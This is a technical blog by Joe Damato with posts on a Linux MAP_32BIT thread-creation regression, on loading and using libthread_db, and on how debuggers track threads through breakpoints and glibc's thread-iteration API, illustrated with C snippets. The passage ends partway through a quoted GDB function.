time to bleed by Joe Damato

technical ramblings from a wanna-be unix dinosaur


Digging out the craziest bug you never heard about from 2008: a linux threading regression



If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This blog post will show how a fix for XFree86 and linuxthreads ended up causing a major threading regression about 7 years after the fix was created.

The regression was in pthread_create. Thread creation performed very slowly as the number of threads in a process increased. This bug is present on CentOS 5.3 (and earlier) and other linux distros as well.

It is also quite possible that this bug affected research on building high performance threaded applications done before August 15, 2008. That date is the best case, since Linux distro releases are slow to pick up fixes.

Digging this thing out was definitely one of the more interesting bug hunts in recent memory.

Hopefully, my long (and insane) story will encourage you to thoroughly investigate suspicious sources of performance degradation before applying the “[thing] is slow” label.

[thing] might be slow, but it may be useful to understand why.

Versions

This blog post will be talking about:

  • glibc 2.7. Earlier versions are probably affected, but you will need to go look and see for sure.
  • Linux kernels earlier than 2.6.27. Some linux distributions will backport fixes, so it is possible you could be running an earlier kernel version, but without the bug described below. You will need to go look and see for sure.

Linux’s mmap and MAP_32BIT

mmap is a system call that a program can use to map regions of memory into its address space. mmap can be used to map files into RAM and to share these mappings with other processes. mmap is also used by memory allocators to obtain large regions of memory that can be carved up and handed out to a program.

On June 29, 2001, Andi Kleen added a flag to Linux’s mmap called MAP_32BIT. The commit message reads, in part [1]:

This adds a new mmap flag to force mappings into the low 32bit address space.
Useful e.g. for XFree86’s ELF loader or linuxthreads’ thread local
data structures.

As Kleen mentions, XFree86 has its own ELF loader that appears to have been released as part of the 4.0.1 release back in 2000. The purpose of this ELF loader is to allow loadable module support for XFree86 even on systems that don’t necessarily have support for loadable modules. Another interesting side effect of the decision to include an ELF loader is that loadable modules can be built once and then reused on any system that XFree86 supports without recompiling the module source.

It appears that Kleen added MAP_32BIT to allow programs (like XFree86) which assumed mmap would always return 32-bit addresses to continue to work properly as 64-bit processors were beginning to enter the market.

Then, on November 11, 2002, Egbert Eich added some code to XFree86 to actually use the MAP_32BIT flag, the commit message says:

532. Fixed module loader to map memory in the low 32bit address space on
x86-64 (Egbert Eich).

Thus, 64-bit XFree86 builds would now have a working ELF loader since those builds would be able to get memory with 32-bit addresses.

I will touch on the threading implications mentioned in Kleen’s commit message a bit later.

ELF small code execution model and a tweak to MAP_32BIT

The AMD64 ABI lists several different code models which differ in addressing, code size, data size, and address range.

Specifically, the spec defines something called the small code model.

The small code model is defined such that all symbols are known to be located in the range from 0 to 0x7EFFFFFF (among other things that are way beyond the scope of this blog post).

To support this code model, Kleen added a small tweak to MAP_32BIT that limits the range of addresses mmap will return.

Unfortunately, I have not been able to track down the exact commit with Kleen’s commit message (if there was one), but it occurred sometime between November 28, 2002 (kernel 2.4.20) and June 13, 2003 (kernel 2.4.21).

I did find what looks like a merge commit or something. It shows the code Kleen added and a useful comment explaining why the address range was being limited:

+	} else if (flags & MAP_32BIT) { 
+		/* This is usually used needed to map code in small
+		   model: it needs to be in the first 31bit. Limit it
+		   to that.  This means we need to move the unmapped
+		   base down for this case.  This may give conflicts
+		   with the heap, but we assume that malloc falls back
+		   to mmap. Give it 1GB of playground for now. -AK */ 
+		if (!addr) 
+			addr = 0x40000000; 
+		end = 0x80000000;		

Unfortunately, now the flag’s name MAP_32BIT is inaccurate.

The range has been limited to a single gigabyte from 0x40000000 (1gb) – 0x80000000 (2gb). This is good enough for the ELF small code model mentioned above, but this means any memory successfully mapped with MAP_32BIT is actually mapped within the first 31 bits and thus this flag should probably be called MAP_31BIT or something else that more accurately describes its behavior.
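If you want to see this for yourself, here is a minimal sketch that asks for a MAP_32BIT mapping and checks where it landed. The helper names map_low and below_2gb are made up for this example, and the sketch assumes Linux; on builds where MAP_32BIT is not defined (anything other than x86-64) map_low simply returns NULL.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>

/* Ask for one anonymous mapping with MAP_32BIT.
 * Returns the mapping, or NULL if the flag is unavailable (non-x86-64
 * builds) or the kernel could not satisfy the request. */
void *map_low(size_t len)
{
    assert(len > 0);
#ifdef MAP_32BIT
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_32BIT, -1, 0);
    return p == MAP_FAILED ? NULL : p;
#else
    return NULL;
#endif
}

/* True if the whole mapping lies below the 2 GB (31-bit) boundary. */
int below_2gb(const void *p, size_t len)
{
    return (uintptr_t)p + len <= (uintptr_t)0x80000000ul;
}
```

On an x86-64 Linux box, below_2gb(map_low(4096), 4096) should hold for every successful mapping, which is exactly why the flag's name is misleading.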

Oops.

pthread_create and thread stacks

When you create a thread using pthread_create there are two ways to allocate a region of memory for that thread to use as its stack:

  • Allow libpthread to allocate the stack itself. You do this by simply calling pthread_create. This is the common case for most programs. Use pthread_attr_getstacksize and pthread_attr_setstacksize to get and set the stack size.

or

  • A three step process:

    1. Allocate a region of memory possibly with mmap, malloc (which may just call mmap for large allocations), or statically.
    2. Use pthread_attr_setstack to set the address and size of the stack in a pthread attribute object.
    3. Pass said attribute object along to pthread_create and the thread which is created will have your memory region set as its stack.
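The three step process above can be sketched roughly like this. The names run_on_own_stack and store_answer are hypothetical, mmap is just one of the allocation options listed above, and the sketch joins the thread before unmapping the stack so the memory is not pulled out from under it.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <pthread.h>
#include <stddef.h>
#include <sys/mman.h>

/* Example thread body: stores 42 through the pointer it is given. */
void *store_answer(void *arg)
{
    *(int *)arg = 42;
    return NULL;
}

/* Run fn(arg) on a thread whose stack we allocate ourselves.
 * Returns 0 on success or an errno-style error code. */
int run_on_own_stack(void *(*fn)(void *), void *arg, size_t stack_size)
{
    pthread_attr_t attr;
    pthread_t tid;
    int err;

    assert(fn != NULL);

    /* Step 1: allocate the region that will become the stack. */
    void *stack = mmap(NULL, stack_size, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (stack == MAP_FAILED)
        return errno;

    /* Step 2: record the stack address and size in an attribute object. */
    err = pthread_attr_init(&attr);
    if (err != 0) {
        munmap(stack, stack_size);
        return err;
    }
    err = pthread_attr_setstack(&attr, stack, stack_size);

    /* Step 3: hand the attribute object to pthread_create. */
    if (err == 0)
        err = pthread_create(&tid, &attr, fn, arg);
    if (err == 0)
        err = pthread_join(tid, NULL);

    pthread_attr_destroy(&attr);
    munmap(stack, stack_size);
    return err;
}
```

Calling run_on_own_stack(store_answer, &value, 1 << 20) runs the thread on a 1 MB stack that libpthread never had to allocate.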

Slow context switches, glibc, thread local storage, … wow …

A lot of really crazy shit happened in 2003, so I will try my best to split into digestible chunks.

Slow context switching on AMD k8

On February 12, 2003, it was reported that early AMD K8 CPUs were very slow when executing the wrmsr instruction, which is used to write to model specific registers (MSRs). This instruction was used a few times in the context switch code, and removing it would speed up context switches. The code was refactored, but the data gathered here would be used as a justification for using MAP_32BIT in glibc a few months later.

MAP_32BIT being introduced to glibc

On March 4, 2003, it appears that Ulrich Drepper added code to glibc to use the MAP_32BIT flag. As far as I can tell, this was the first time MAP_32BIT was used in glibc [2].

An interesting comment is presented with a small piece of the patch:

+/* For Linux/x86-64 we have one extra requirement: the stack must be
+   in the first 4GB.  Otherwise the segment register base address is
+   not wide enough.  */
+#define EXTRA_PARAM_CHECKS \
+  if ((uintptr_t) stackaddr > 0x100000000ul                                  \
+      || (uintptr_t) stackaddr + stacksize > 0x100000000ul)                  \
+    /* We cannot handle that stack address.  */                                      \
+    return EINVAL

To understand this comment it is important to understand how Linux deals with thread local storage.

Briefly,

  • Each thread has a thread control block (TCB) that contains various internal information that nptl needs, including some data that can be used to access thread local storage.
  • The TCB is written to the start of the thread stack by nptl.
  • The address of the TCB (and thus the thread stack) needs to be stored in such a way that nptl, code generated by gcc, and the kernel can access the thread control block of the currently running thread. In other words, it needs to be context switch friendly.
  • The register set of Intel processors is saved and restored each time a context switch occurs.
  • Saving the address of the TCB in a register would be ideal.

x86 and x86_64 processors are notorious for not having many registers available. However, Linux does not use the FS and GS segment selectors for segmentation, so the address of the TCB can be stored in FS or GS if it will fit.

Unfortunately, the segment selectors FS and GS can only store 32-bit addresses and this is why Ulrich added the above code. Addresses above 4gb could not be stored in FS or GS.

It appears that this comment is correct for all of the Linux 2.4 series kernels and all Linux 2.5 kernels less than 2.5.65. On these kernel versions, only the segment selector is used for storing the thread stack address and as a result no thread stack above 4gb can be stored.

32-bit and 64-bit thread stacks

Starting with Linux 2.5.65 (and more practically, Linux 2.6.0), support for both 32-bit and 64-bit thread stacks had made its way into the kernel. 32-bit thread stacks would be stored in a segment selector while 64-bit thread stack addresses would be stored in a model specific register (MSR).

Unfortunately, as was reported on February 12, 2003, writing to MSRs is painfully slow on early AMD K8 processors. To avoid writing to an MSR, you would need to supply a 32-bit thread stack address, and thus Ulrich added the following code to glibc on May 9, 2003:

+/* We prefer to have the stack allocated in the low 4GB since this
+   allows faster context switches.  */
+#define ARCH_MAP_FLAGS MAP_32BIT
+
+/* If it is not possible to allocate memory there retry without that
+   flag.  */
+#define ARCH_RETRY_MMAP(size) \
+  mmap (NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC,                              \
+       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)
+
+

This code is interesting for two reasons:

  1. The justification for using MAP_32BIT has changed from the kernel not supporting addresses above 4gb to decreasing context switch cost.
  2. A retry mechanism is added so that if no memory is available when using MAP_32BIT, a thread stack will be allocated somewhere else.
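Stripped of the macros, the allocation pattern those two points describe looks roughly like the sketch below. This is not glibc's code: alloc_stack_prefer_low is a made-up name, PROT_EXEC is left out, and on builds without MAP_32BIT the flag is defined to 0 so the first call behaves like a plain mmap.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>

#ifndef MAP_32BIT
#define MAP_32BIT 0 /* assumption: treat the flag as a no-op off x86-64 */
#endif

/* Prefer a stack in low memory and fall back to anywhere if that fails.
 * *used_fallback is set to 1 when the second mmap call was needed.
 * Returns NULL if both attempts fail. */
void *alloc_stack_prefer_low(size_t size, int *used_fallback)
{
    assert(size > 0 && used_fallback != NULL);

    const int base_flags = MAP_PRIVATE | MAP_ANONYMOUS;

    /* First system call: try the low region. */
    void *p = mmap(NULL, size, PROT_READ | PROT_WRITE,
                   base_flags | MAP_32BIT, -1, 0);
    *used_fallback = 0;

    if (p == MAP_FAILED) {
        /* Second system call: retry without the flag. */
        p = mmap(NULL, size, PROT_READ | PROT_WRITE, base_flags, -1, 0);
        *used_fallback = 1;
    }
    return p == MAP_FAILED ? NULL : p;
}
```

Once the low region is full, every call takes the fallback path, so each new thread stack costs two system calls instead of one.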

At some point between late 2002 and mid-2003 (I don’t know exactly when), MAP_32BIT was restricted, as explained earlier, to deal with the ELF small code model in the AMD64 ABI.

The end result being that user programs have only 1gb of space with which to allocate all their thread stacks (or other low memory requested with MAP_32BIT).

This seems bad.

Fast forward to 2008: a bug

On August 13, 2008 an individual named “Pardo” from Google posted a message to the Linux kernel mailing list about a regression in pthread_create:

mmap() is slow on MAP_32BIT allocation failure, sometimes causing
NPTL’s pthread_create() to run about three orders of magnitude slower.
As example, in one case creating new threads goes from about 35,000
cycles up to about 25,000,000 cycles — which is under 100 threads per
second.

Pardo had filled the 1gb region that MAP_32BIT tries to use for thread stacks, causing glibc to fall back to the retry mechanism that Drepper added back in 2003.

Unfortunately, the failing mmap call with MAP_32BIT was doing a linear fucking search of all the “low address space” memory regions trying to find a fit before falling back and calling mmap a second time without MAP_32BIT.

And so after a few thousand threads, every new pthread_create call would trigger two system calls, the first of which would do a linear search of low memory before failing. The linear search and retry dramatically increased the time to create new threads.

This is pretty bad.

bugfixes for the kernel and glibc

So, how do glibc and the kernel fix this problem?

Ingo Molnar convinced everyone that the best solution was to add a new flag to the Linux kernel called MAP_STACK. This flag would be defined as “give out an address that is best suited for process/thread stacks”. This flag would actually be ignored by the kernel. This change appeared in Linux kernel 2.6.27 and was added on August 13, 2008.

Ulrich Drepper updated glibc to use MAP_STACK instead of MAP_32BIT and he removed the retry mechanism he added in 2003 since MAP_STACK should always succeed if there is any memory available. This change was added on August 15, 2008.

Unfortunately, MAP_32BIT cannot be removed from the kernel because there are many programs out in the wild (older versions of glibc, XFree86, older versions of ocamlc) that rely on this flag existing to actually work.

And so, MAP_32BIT will remain. A misnamed, strange looking wart that will probably be around forever to remind us that computers are hard.

Bad research (or not)?

I recall reading a paper that benchmarked thread creation time from back in the 2005-2008 time period which claimed that as the number of threads increased the time to create new threads also increased and thus, threads were bad.

I can’t seem to find that paper and it is currently 3:51 AM PST, so who knows, I could be misremembering things. If someone knows what paper I am talking about, please let me know.

If such a paper exists (and I think it does), this blog post explains why thread creation benchmarks would have resulted in really bad looking graphs.

Conclusion

I really don’t even know what to say, but:

  • Computers are hard
  • Ripping the face off of bugs like this is actually pretty fun
  • Be careful when adding linear time searches to potential hot paths
  • Make sure to carefully read and consider the effects of low level code
  • Git is your friend and you should use it to find data about things from years long gone
  • Any complicated application, kernel, or whatever will have a large number of ugly scars and warts that cannot be changed to maintain backward compatibility. Such is life.


References

  1. http://web.archiveorange.com/archive/v/iv9U0zrDmBRAagTHyhHz
  2. The sha for this change is: 0de28d5c71a3b58857642b3d5d804a790d9f6981 for those who are curious to read more.

Written by Joe Damato

May 6th, 2013 at 4:13 am

Posted in bugfix,linux

Notes about an odd, esoteric, yet incredibly useful library: libthread_db


tl;dr

This blog post will examine one of the weirder libraries I’ve come across: libthread_db.

libthread_db is typically used by debuggers, tracers, and other low level debugging/profiling applications to gather information about the threads in a running target process. Unfortunately, the documentation about how to use this library is a bit lacking and using it is not straightforward at all.

This library is pretty strange and there are several gotchas when trying to write a debugger or tracing program that makes use of the various features libthread_db provides.

Loading the library (and probably failing)

As strange as it may seem to those who haven’t used this library before, loading and linking to libthread_db is not as straightforward as simply adding -lthread_db to your linker flags.

The key thing to understand is that different target programs may use different threading libraries. Individual threading libraries may or may not have a corresponding libthread_db that works with a particular threading library, or even with a particular version of a particular threading library.

So until you attach to a target process, you have no idea which of the possibly several libthread_db libraries on the system you will need to use to gather threading information from a target process.

You don’t even know where the corresponding libthread_db library may live.

So, to load libthread_db in your debugger/tracer, you must:

  1. Attach to your target process, usually via ptrace.
  2. Traverse the target process’ link map to determine which libraries are currently loaded. Your program should search for the threading library of the process (often libpthread, but maybe your target program uses something else instead).
  3. Once found, your program can search in nearby directories for the location of libthread_db. In the most common case, a program will use libpthread as its threading library and the corresponding libthread_db will be located in the same directory. Of course, you could also allow the user to specify the exact location.
  4. Once found, simply use libdl to dlopen the library.
  5. If your target process is a linux process which uses libpthread (a common case), libthread_db fails to load with libdl. Other libthread_db libraries may or may not load fine.
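As a rough sketch of step 3, assuming you have already pulled the threading library's path out of the target's link map, you can build the "look in the same directory" candidate like this. The function name thread_db_candidate is hypothetical, and the file name libthread_db.so.1 is the one that shows up in the ldd output later in this post; other systems may name it differently.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Given the path of the target's threading library, write the path of a
 * libthread_db.so.1 in the same directory into out.
 * Returns 0 on success, -1 if the path has no directory part or out is
 * too small to hold the result. */
int thread_db_candidate(const char *threadlib_path, char *out, size_t outlen)
{
    assert(threadlib_path != NULL && out != NULL);

    const char *slash = strrchr(threadlib_path, '/');
    if (slash == NULL)
        return -1;

    int dirlen = (int)(slash - threadlib_path);
    int n = snprintf(out, outlen, "%.*s/libthread_db.so.1",
                     dirlen, threadlib_path);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}
```

The resulting path is what you would hand to dlopen in step 4, after checking that the file actually exists.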

libthread_db’s numerous undefined symbols

If you’ve followed the above steps to attempt to locate libthread_db and are targeting a linux process that uses libpthread, you have now most likely failed to load it due to a number of undefined symbols.

Let’s use ldd to figure out what is going on:

joe@ubuntu:~$ ldd -r /lib/x86_64-linux-gnu/libthread_db.so.1 | grep undefined
undefined symbol: ps_pdwrite	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_pglobal_lookup	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_lsetregs	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_getpid	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_lgetfpregs	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_lsetfpregs	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_lgetregs	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_pdread	(/lib/x86_64-linux-gnu/libthread_db.so.1)

Bring your own symbols to this party

libthread_db will fail to load due to undefined symbols because the library expects your program to provide the implementations of these symbols. Unfortunately, the only way to determine which functions must be implemented is to examine the source code of the libthread_db implementation(s) you are targeting.

The libthread_db implementations that come with glibc include a header file named proc_service.h which lists all the functions and prototypes that your program must provide. I’ve noticed that other libthread_db implementations also provide a similar header file.

These functions are all very platform specific and to maximize the portability of the various implementations of libthread_db the implementations are left to the program using libthread_db.

In general, your program must provide implementations of:

  • Functions to read from and write to the address space of a targeted process. Typically implemented with ptrace.
  • Functions to read and write the general purpose registers and floating point registers (if there are any). Typically implemented with ptrace.
  • A function to locate a specified shared object and search that object for a particular symbol. This function is significantly more complex than the other functions. Your program could use something like libbfd or libelf to make locating a library and searching its symbol tables easier. If you are implementing a debugger or tracer, you likely already have the pieces you need to implement this function.
  • A structure struct ps_prochandle that libthread_db will pass through to the functions you implemented that are described above. You will place whatever data your functions need in it. Typically this is something like a pid that you can pass through to ptrace.
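To give a feel for the memory reading piece, here is a minimal sketch built on ptrace. The struct layout (just a pid) and the helper names attach_and_wait and read_target are assumptions for this example; a real ps_pdread would be a thin wrapper around something like read_target using the exact prototype from proc_service.h. Note that PTRACE_PEEKDATA transfers one word at a time, so this sketch can touch a few bytes past the requested range on the final word.

```c
#include <assert.h>
#include <errno.h>
#include <signal.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical contents: whatever your callbacks need. Here, just a pid. */
struct ps_prochandle {
    pid_t pid;
};

/* Attach to the target and wait for it to stop. Returns 0 on success. */
int attach_and_wait(struct ps_prochandle *ph)
{
    int status;

    assert(ph != NULL);
    if (ptrace(PTRACE_ATTACH, ph->pid, NULL, NULL) == -1)
        return -1;
    if (waitpid(ph->pid, &status, 0) == -1 || !WIFSTOPPED(status))
        return -1;
    return 0;
}

/* Copy len bytes from address addr in the target into buf.
 * Returns 0 on success, -1 if any word could not be read. */
int read_target(struct ps_prochandle *ph, uintptr_t addr, void *buf, size_t len)
{
    unsigned char *out = buf;

    assert(ph != NULL && buf != NULL);
    while (len > 0) {
        /* PEEKDATA returns the word itself, so errno is the only way to
         * tell a failure apart from a word whose value is -1. */
        errno = 0;
        long word = ptrace(PTRACE_PEEKDATA, ph->pid, (void *)addr, NULL);
        if (word == -1 && errno != 0)
            return -1;

        size_t n = len < sizeof word ? len : sizeof word;
        memcpy(out, &word, n);
        out += n;
        addr += n;
        len -= n;
    }
    return 0;
}
```

A quick way to try it is to fork a child, attach to it, read back a variable whose address you know (the child shares the parent's layout), and then kill the child.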

libthread_db still fails to load

So, you’ve implemented the symbols you were required to implement, but you are still unable to load libthread_db with libdl because you are getting undefined symbol: ... errors.

Even stranger, you are getting these errors even though you are providing the symbols listed in the error messages!

The problem that you are running into is that the symbols are not being placed into the correct ELF symbol table. When you build an executable with gcc, the exported symbols of the executable are placed in the ELF section named .symtab. When libthread_db gets loaded with libdl, only the symbols in the .dynsym symbol table are examined to resolve dependencies. Thus, your symbols will not be found and libthread_db will fail to load.

Why this happens is beyond the scope of this blog post, but I’ve written about dynamic linking and symbol tables before here and here, if you are curious to learn a bit more.

Use this one weird trick for getting your symbols in the dynamic symbol table

There are actually two ways to make sure your symbols end up in the dynamic symbol table.

The first way to do it is to use the large hammer approach and pass the flag --export-dynamic to ld. This will add all exported symbols to the dynamic symbol table and you will be able to load libthread_db.

The second way to do it is much cleaner and strongly recommended over the previous method.

  • Create a file which specifies the symbol names you want added to the dynamic symbol table.
  • Use the linker flag --dynamic-list=FILENAME to let ld know which symbols you want placed in the dynamic symbol table.

Your file might look something like this:

{
   ps_pdread;
   ps_pdwrite;
   ps_pglobal_lookup;
   /* more symbol names would go here... */
};

If you are using gcc, you can then simply pass the flag: -Wl,--dynamic-list=FILENAME and your executable will have the symbols listed in the file placed in the dynamic symbol table.

Regardless of which method you use, be sure to verify the results by using readelf to check that the symbols actually made it into the dynamic symbol table.

Calling the initialize function and allocating a libthread_db handle

So, after all that work you will finally be able to load the library.

Since the library was loaded with libdl, you will need to use dlsym to grab function pointers to all the functions you intend to use. This is kind of tedious, but you can make clever use of C macros to help you, as long as you also make use of documentation to explain how they work.

So, to find and call the initialize function (without any macros for sanity and clarity):

  /* find the init function */
  td_init = dlsym(handle, "td_init");
  if (td_init == NULL) {
    fprintf(stderr, "Unable to find td_init\n");
    return -1;
  }

  /* call the init function */
  err = td_init();
  if (err != TD_OK) {
    fprintf(stderr, "td_init: %d\n", err);
    return -1;
  }

  /* find the libthread_db handle allocator function */
  td_ta_new = dlsym(handle, "td_ta_new");
  if (td_ta_new == NULL) {
    fprintf(stderr, "Unable to find td_ta_new\n");
    return -1;
  }

  /* call td_ta_new */
  err = td_ta_new(&somestructure->ph, &somestructure->ta);
  if (err != TD_OK) {
    fprintf(stderr, "td_ta_new failed: %d\n", err);
    return -1;
  }

  /* XXX don't forget about td_ta_delete */
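For comparison, here is one way the macro approach mentioned above might look. LOAD_SYM, struct math_fns, and load_math_fns are made-up names, and the sketch loads two functions from libm only so that it can run anywhere; for libthread_db you would point the same macro at td_init, td_ta_new, and friends, with function pointer types taken from thread_db.h.

```c
#include <assert.h>
#include <dlfcn.h>
#include <stdio.h>

/* Look up `name` in `handle`, store it in the function pointer `dest`,
 * and return -1 from the enclosing function if the symbol is missing.
 * The cast through void ** is the usual way to assign dlsym's result
 * to a function pointer. */
#define LOAD_SYM(handle, dest, name)                          \
    do {                                                      \
        *(void **)(&(dest)) = dlsym((handle), (name));        \
        if ((dest) == NULL) {                                 \
            fprintf(stderr, "Unable to find %s\n", (name));   \
            return -1;                                        \
        }                                                     \
    } while (0)

/* Stand-in table of function pointers for this example. */
struct math_fns {
    double (*cos_fn)(double);
    double (*sqrt_fn)(double);
};

/* Fill in every pointer in out. Returns 0 on success, -1 on failure. */
int load_math_fns(void *handle, struct math_fns *out)
{
    assert(handle != NULL && out != NULL);
    LOAD_SYM(handle, out->cos_fn, "cos");
    LOAD_SYM(handle, out->sqrt_fn, "sqrt");
    return 0;
}
```

The hidden return inside the macro is exactly the kind of thing that deserves a comment, since it is easy to miss when reading the call sites.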

A cool version check

td_ta_new performs a rather interesting version check when called before allocating a handle:

  1. First, it uses the ps_pglobal_lookup symbol you implemented to search for the symbol nptl_version in the libpthread library linked into the remote process. Your function should find this symbol and return the address.
  2. Next, td_ta_new reads several bytes from the target process at the address your ps_pglobal_lookup returned using your ps_pdread function.
  3. Lastly, the bytes read from the target process are checked against libthread_db’s internal version to determine if the versions match.

So, the library you load calls functions you implemented to search the symbol tables of a process you are attached to in order to read a series of bytes out of that process’ address space to determine if that process’ threading library matches the version of libthread_db you loaded into your debugger.

Fucking rad.

By the way, if you were wondering why libpthread is one of the few libraries that is not stripped on Linux, now you know. If it were stripped, this check would fail, unless of course your ps_pglobal_lookup function searched debug information.
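The comparison at the heart of the version check is tiny. Here is a sketch of it under the assumption that the version is a NUL-terminated string such as "2.17" and that the terminator takes part in the comparison; nptl_versions_match is a made-up name, not a function from libthread_db.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Compare the bytes read from the target's nptl_version symbol with the
 * version string this libthread_db was built against. The terminating
 * NUL is included, so "2.1" does not match "2.17".
 * Returns 1 on a match, 0 otherwise. */
int nptl_versions_match(const char *target_bytes, size_t target_len,
                        const char *own_version)
{
    assert(target_bytes != NULL && own_version != NULL);

    size_t need = strlen(own_version) + 1;
    if (target_len < need)
        return 0;
    return memcmp(target_bytes, own_version, need) == 0;
}
```

In the real flow, target_bytes would be whatever your ps_pdread copied out of the target process.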

Now you can use the library

At this point, you’ve done enough setup to use dlsym to look up and call the various functions that iterate over the threads in a remote process, notify you asynchronously when threads are created or destroyed, and access thread local data if you want to.

Conclusion

Here’s a summary of the steps you need to go through to load, link, and use libthread_db:

  • Implement a series of functions and structures specified in the libthread_db implementation(s) you are targeting. You can find these in the header file called proc_service.h.
  • Attach to the remote process, determine the path of the threading library it is using and look nearby to find libthread_db. Alternatively, allow the user to specify the location of libthread_db.
  • Use libdl to load the library by calling dlopen.
  • Use dlsym to find td_init and td_ta_new. Call these functions to initialize the library.
  • Ensure you are using either --export-dynamic or --dynamic-list=FILENAME to place the symbols in the correct symbol table so that the runtime dynamic linker will find them when you load libthread_db.
  • Make sure to use lots of error checking and debug output to ensure that your implemented functions are being hit and that they are returning the proper return values as specified in proc_service.h.
  • Sit back and consider that this entire process actually works and allows you to debug or trace processes with multiple threads.


Written by Joe Damato

April 22nd, 2013 at 2:24 am

How do debuggers keep track of the threads in your program?


tl;dr

This post describes the relatively undocumented API for debuggers (or other low level programs) that can be used to enumerate the existing threads in a process and receive asynchronous notifications when threads are created or destroyed. This API also provides asynchronous notifications of other interesting thread-related events and feels very similar to the interface exposed by libdl for notifying debuggers when libraries are loaded dynamically at run time.

amd64 and gnu syntax

As usual, everything below refers to amd64 unless otherwise noted. Also, all assembly is in AT&T syntax.

software breakpoints

It’s important to begin first by examining how software breakpoints work. We’ll see shortly why this is important, but for now just trust me.

A debugger sets a software breakpoint by using the ptrace system call to write a special instruction into a target process’ address space. That instruction raises software interrupt #3 which is defined as the Breakpoint Exception in the Intel 64 Architecture Developers Manual [1]. When this interrupt is raised, the processor undergoes a privilege level change and calls a function specified by the kernel to handle the exception.

The exception handler in the kernel executes to deliver the SIGTRAP signal to the process. However, if a debugger is attached to a process with ptrace, all signals are first delivered to the debugger. In the case of SIGTRAP, the debugger can examine the list of breakpoints set by the user and take the appropriate action (draw a UI, update the console, or whatever).

The debugger finishes up by masking this signal from the process it is attached to, preventing that process from being killed (most processes will not have a signal handler for SIGTRAP).
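To make the "write a special instruction" step a bit more concrete: ptrace reads and writes target memory a word at a time, so a debugger typically reads the word at the breakpoint address, swaps in the one-byte breakpoint opcode (0xCC), and writes the word back. The sketch below shows only that byte patching, assuming a little-endian x86 target where the byte at the breakpoint address is the low byte of the word. The function names are made up for this example.

```c
#include <assert.h>
#include <stdint.h>

#define INT3_OPCODE 0xCCu /* single-byte x86 breakpoint instruction */

/* The byte that lives at the lowest address of a little-endian word. */
uint8_t first_byte(uint64_t word)
{
    return (uint8_t)(word & 0xFF);
}

/* Return the word with its first byte replaced by the breakpoint opcode. */
uint64_t word_with_breakpoint(uint64_t original_word)
{
    uint64_t patched = (original_word & ~(uint64_t)0xFF) | INT3_OPCODE;
    assert(first_byte(patched) == INT3_OPCODE);
    return patched;
}

/* Undo the patch by putting the saved original byte back. */
uint64_t word_with_original_byte(uint64_t patched_word, uint8_t saved_byte)
{
    return (patched_word & ~(uint64_t)0xFF) | saved_byte;
}
```

The debugger has to remember the byte it overwrote so it can restore the original instruction when the breakpoint is hit or removed.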

In practice most binaries generated by compilers will not have this instruction; it is up to the debugger to write this instruction into the process’ address space during runtime. If you are so inclined, you can raise interrupt #3 via inline assembly or by calling an assembly stub yourself. Many debuggers will catch this signal and trigger an update of some form in the UI.

All that said, this is what the instruction looks like when disassembled:

int 0x03
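If you want to poke at this without a debugger, here is a small sketch that installs a SIGTRAP handler and then executes a breakpoint instruction itself. The function names are hypothetical, and the inline assembly is GCC/Clang syntax for x86; on other architectures the sketch falls back to raise(SIGTRAP), which exercises the signal path but not the instruction.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <signal.h>
#include <string.h>

static volatile sig_atomic_t trap_seen = 0;

static void on_sigtrap(int signo)
{
    (void)signo;
    trap_seen = 1;
}

/* Execute a breakpoint instruction in the current process. */
void execute_int3(void)
{
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("int3");
#else
    raise(SIGTRAP);
#endif
}

/* Install a SIGTRAP handler, call trigger, restore the old handler.
 * Returns 1 if the handler ran, 0 if not, -1 if sigaction failed. */
int run_with_trap_handler(void (*trigger)(void))
{
    struct sigaction sa, old;

    assert(trigger != NULL);
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_sigtrap;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGTRAP, &sa, &old) == -1)
        return -1;

    trap_seen = 0;
    trigger();

    sigaction(SIGTRAP, &old, NULL);
    return trap_seen ? 1 : 0;
}
```

Without the handler installed (and without a debugger attached), the same instruction would kill the process with SIGTRAP.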

You may find it useful to check out an earlier and more in-depth article I wrote a while ago about signal handling.

Enumerating threads when first attaching

When a debugger first attaches to a program the program has an unknown number of threads that must be enumerated. glibc exposes a straightforward API for this called td_ta_thr_iter [2], found in glibc at nptl_db/td_ta_thr_iter.c. This function takes a callback as one of its arguments. The callback is called once per thread and is passed a handle to an object describing each thread in the process.

We can see the code in GDB [3] which uses this API to hand over a callback which will be hit to enumerate the existing threads in a process:

static int
find_new_threads_once (struct thread_db_info *info, int iteration,
                       td_err_e *errp)
{
  volatile struct gdb_exception except;
  struct callback_data data;
  td_err_e err = TD_ERR;

  data.info = info;
  data.new_threads = 0;

  TRY_CATCH (except, RETURN_MASK_ERROR)
    {
      /* Iterate over all user-space threads to discover new threads.  */
      err = info->td_ta_thr_iter_p (info->thread_agent,
                                    find_new_threads_callback,
                                    &data,
                                    TD_THR_ANY_STATE,
